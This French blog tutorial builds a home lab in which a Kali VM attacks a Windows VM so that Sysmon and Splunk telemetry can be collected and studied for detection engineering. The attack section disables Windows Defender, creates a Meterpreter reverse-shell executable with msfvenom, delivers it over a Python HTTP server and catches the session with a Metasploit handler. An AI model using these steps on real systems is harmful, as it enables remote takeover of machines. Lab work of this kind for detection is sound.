Accueil/Astuces/Comprendre la Télémétrie de Sécurité : Attaque et Détection en Home Lab

Comprendre la Télémétrie de Sécurité : Attaque et Détection en Home Lab

Publié le 12 octobre 2025 par IbansConcept
Comprendre la Télémétrie de Sécurité Attaque et Détection en Home Lab

Dans le monde de la cybersécurité, la capacité à détecter des activités malveillantes est primordiale. Avant de pouvoir détecter efficacement, il est crucial de comprendre ce que nous devons chercher et comment ces activités se manifestent dans les systèmes. Cet article vous guide à travers un exercice pratique en « home lab » pour générer et analyser la télémétrie, un élément clé dans la conception de stratégies de détection.

Avertissement : Ce tutoriel est fourni à des fins strictement éducatives et éthiques. Toutes les actions décrites doivent être réalisées dans un environnement de laboratoire isolé (machines virtuelles) et sur des systèmes dont vous êtes le propriétaire légitime et sur lesquels vous avez l’autorisation explicite d’effectuer de tels tests. Toute utilisation de ces techniques à des fins illégales ou malveillantes est formellement interdite et peut entraîner de graves conséquences légales. Nous n’aborderons pas les techniques d’évasion d’antivirus dans ce guide.

Sommaire

Pourquoi la Télémétrie est-elle Cruciale ?

La télémétrie fait référence aux données collectées sur le comportement d’un système. Pour un analyste en sécurité, cette télémétrie est une mine d’or. Elle permet de reconstruire la chronologie d’une attaque, d’identifier les vecteurs d’infection, et surtout, de créer des règles de détection robustes pour prévenir de futures menaces. Notre objectif est de générer volontairement cette télémétrie pour l’analyser.

1. Configuration de l’Environnement de Laboratoire

Pour cet exercice, nous aurons besoin de deux machines virtuelles :

  • Machine Attaquante : Une VM sous Kali Linux. C’est notre plateforme d’outils de pénétration.
  • Machine Cible : Une VM sous Windows (par exemple, Windows 10). C’est notre victime désignée pour l’expérience.

Utilisez VirtualBox ou Hyper-V pour créer ces VMs.

Bonnes Pratiques pour le Lab :

  1. Environnement Sandbox : Travailler toujours dans un environnement isolé pour éviter tout impact sur votre réseau principal.
  2. Snapshots : Avant chaque étape majeure, prenez un snapshot de vos VMs. Cela vous permettra de revenir à un état antérieur en cas de problème ou si vous souhaitez refaire l’expérience.
  3. Spécifications : Allouez judicieusement les ressources (RAM, CPU) à vos VMs. Un excès de ressources peut ralentir votre machine physique, surtout si elle a des spécifications modestes. Par exemple, si vous avez 8 Go de RAM, donnez 2 Go à Windows et 1.5 Go à Kali.

Configuration Réseau :

Assurez-vous que vos deux VMs se trouvent sur le même réseau interne ou « hôte-seulement » pour qu’elles puissent communiquer.

  1. Adresses IP Statiques : Attribuez des adresses IP statiques à chaque VM :
    • Kali Linux : 192.168.1.10 (par exemple)
    • Windows : 192.168.1.20 (par exemple)
  2. Vérification de la Connectivité : Effectuez un ping entre les deux machines pour confirmer la communication :
    • Depuis Kali : ping 192.168.1.20
    • Depuis Windows (Invite de Commande) : ping 192.168.1.10

Installation des Outils de Télémétrie sur Windows :

Sur votre VM Windows, nous allons installer un système de collecte de logs :

  1. Splunk : Téléchargez et installez Splunk Enterprise (la version gratuite « Free » est suffisante pour un lab). Splunk sera notre plateforme SIEM (Security Information and Event Management) pour analyser les logs.
  2. Sysmon et Configuration Olaf : Installez Sysmon (System Monitor) de Microsoft Sysinternals. Sysmon est un service système qui logue des informations détaillées sur l’activité des processus, les connexions réseau, etc.
    • Configurez Sysmon avec la configuration modulaire d’Olaf Hartong. Cette configuration est excellente car elle est optimisée pour la détection et collecte un large éventail d’événements de sécurité pertinents. Vous pouvez télécharger le fichier sysmonconfig.xml depuis le dépôt GitHub d’Olaf Hartong : sysmon-modular sur GitHub.

2. Le Scénario d’Attaque : Générer de la Télémétrie

Maintenant que notre lab est prêt, nous allons simuler une attaque simple pour générer des données de télémétrie.

Étape 1 : Scanner la Cible avec Nmap

Depuis votre machine Kali, utilisez Nmap pour découvrir les ports ouverts sur la machine Windows :

nmap -A 192.168.1.20

nmap -A effectue un scan agressif pour détecter le système d’exploitation, les versions des services et bien d’autres informations. Notez les résultats ; ils représentent les informations qu’un attaquant pourrait recueillir avant une intrusion.

Étape 2 : Désactiver Windows Defender

Pour cet exercice centré sur la télémétrie système, nous allons temporairement désactiver Windows Defender sur la machine cible. Cela nous permet de nous concentrer sur les logs générés par Sysmon et Splunk, sans l’interférence de l’antivirus.

  • Sur la VM Windows, allez dans Paramètres > Mise à jour et sécurité > Sécurité Windows > Protection contre les virus et menaces > Gérer les paramètres et désactivez la « Protection en temps réel ».

Étape 3 : Créer un Malware (Reverse Shell) avec MSFvenom

Depuis votre machine Kali, nous allons créer un exécutable malveillant (payload.exe) qui, une fois exécuté sur la cible, établira une connexion « reverse shell » vers notre machine Kali.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe
  • LHOST : Votre adresse IP Kali.
  • LPORT : Le port d’écoute sur Kali.

Étape 4 : Préparer l’Écoute sur Kali avec Metasploit

Ouvrez une nouvelle console Metasploit sur Kali pour écouter la connexion entrante :

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
Comprendre la Télémétrie de Sécurité Attaque et Détection en Home Lab

Étape 5 : Exécuter le Malware sur la Cible Windows

Transférez le fichier payload.exe de Kali à Windows (par exemple, via un serveur HTTP Python simple sur Kali : python3 -m http.server 8080, puis téléchargez-le depuis Windows via http://192.168.1.10:8080/payload.exe).

Enfin, sur la machine Windows, double-cliquez sur payload.exe. Vous devriez voir une session Meterpreter s’ouvrir dans votre console Metasploit sur Kali, confirmant le succès de l’opération.

3. Analyse de la Télémétrie avec Splunk

Le moment est venu d’examiner ce que notre « attaque » a généré en termes de logs. Accédez à l’interface web de Splunk sur votre machine Windows.

Recherches Clés dans Splunk :

  1. Exécution de Processus : Recherchez des événements Sysmon liés à la création du processus payload.exe.
    • Exemple de recherche Splunk : index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventID=1 Image="*payload.exe*"
    • Examinez les détails : Quel est le processus parent ? Quels arguments ont été utilisés ?
  2. Connexions Réseau : Identifiez les événements de connexion réseau sortante initiés par payload.exe vers votre machine Kali (192.168.1.10:4444).
    • Exemple de recherche Splunk : index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventID=3 Image="*payload.exe*" DestIp="192.168.1.10" DestPort="4444"
    • Ceci est un indicateur fort d’activité malveillante.
  3. Commandes Exécutées : Si vous avez exécuté des commandes via le shell Meterpreter (par exemple shell suivi de whoami), recherchez ces commandes.
    • Les configurations Sysmon d’Olaf sont excellentes pour capturer les commandes exécutées.

L’objectif est de voir comment ces activités « malveillantes » se manifestent dans les logs. Chaque événement, chaque détail, peut être utilisé pour créer des alertes ou des tableaux de bord de sécurité.

Conclusion

Cet exercice de home lab est une excellente introduction à la manière dont les attaques se déroulent du point de vue de la détection. En générant volontairement de la télémétrie, nous pouvons mieux comprendre les traces laissées par un attaquant et développer des stratégies de détection plus efficaces. La prochaine étape serait d’itérer sur ces détections, de les affiner et, éventuellement, de commencer à explorer les techniques d’évasion d’antivirus, toujours dans un cadre éthique et contrôlé.

Si vous êtes débutant, découvrez ce guide, Défense en Profondeur : Attaquer et Défendre Son Réseau avec Nmap et UFW

N’hésitez pas à partager vos observations et vos découvertes dans les commentaires ci-dessous !

Articles Similaires

Ubuntu Server “No space left on device” alors que df -h montre de la place

Ubuntu Server: No space left on device despite free space

Hyper-V cannot start because the hypervisor is not running

Hyper-V cannot start because the hypervisor is not running

Laisser un commentaire